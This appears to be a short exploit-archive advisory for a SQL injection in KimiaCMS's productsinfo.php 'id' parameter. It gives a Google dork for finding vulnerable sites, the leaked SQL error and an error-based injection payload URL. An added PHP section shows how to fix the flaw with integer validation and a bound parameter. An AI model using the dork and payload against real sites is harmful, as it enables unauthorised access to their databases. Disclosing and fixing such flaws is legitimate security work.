KimiaCMS suffers from a remote SQL injection vulnerability.
+-------------------------------+------------------------------+
KimiaCMS ("productsinfo.php?id=") SQL Injection Vulnerability
Author: R3VAN_BASTARD (walkingdead@anotherdayanothercity.com)
HomePage: INDONESIA RAYA - JOGJA - WARUNG BOTO
+-------------------------------+------------------------------+
[X] VENDOR: http://www.kimia.co.za/
[X] DOWNLOAD: $$$
[X] Vulnerability: SQL INJECTION
[X] DORK: "Graphic design & Web design by Kimia"
+-------------------------------+------------------------------+
FILE: http://localhost/productsinfo.php?id=NULL
Error in sql statement!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL = UPDATE `catalogue-product-item` SET `number-of-views` = `number-of-views` + 1 WHERE id = NULL\'
EXPLOIT: http://localhost/productsinfo.php?id=NULL AND (SELECT 1227 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,118,97,58),(SELECT (CASE WHEN (1227=1227) THEN 1 ELSE 0 END)),CHAR(58,118,113,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
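MITIGATION (added example, not KimiaCMS code and not part of the original advisory): the error output above shows the quote being escaped (`\'`) while `id` sits unquoted in a numeric context, so quote escaping alone does not stop the injection. The sketch below validates the id as an integer, binds it as a parameter, and keeps SQL errors out of the response. The function name `recordProductView`, the DSN and the credentials are hypothetical; the table and column names are taken from the error message.

```php
<?php
// Added example, not KimiaCMS source. Function name, DSN and credentials are
// hypothetical; table/column names come from the error output in the advisory.
declare(strict_types=1);

function recordProductView(PDO $db, mixed $rawId): bool
{
    // The id is used in a numeric context, so accept only a positive integer.
    // Arrays, null, "NULL", "1 AND ..." and "1'" all fail validation here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return false;
    }

    // Bound parameter: the value is never concatenated into the SQL text.
    $stmt = $db->prepare(
        'UPDATE `catalogue-product-item`
            SET `number-of-views` = `number-of-views` + 1
          WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount() === 1;   // false when no such product exists
}

// Never echo database errors or the SQL statement to the client; log them.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

$db = new PDO('mysql:host=localhost;dbname=shop;charset=utf8mb4', 'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,   // use server-side prepared statements
]);

try {
    if (!recordProductView($db, $_GET['id'] ?? null)) {
        http_response_code(404);
        exit;
    }
} catch (PDOException $e) {
    error_log('productsinfo view counter failed: ' . $e->getMessage());
    http_response_code(500);
    exit;
}
```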
+-------------------------------+------------------------------+
Thanks To: My Wife Listo.hurt - All my friends
+-------------------------------+------------------------------+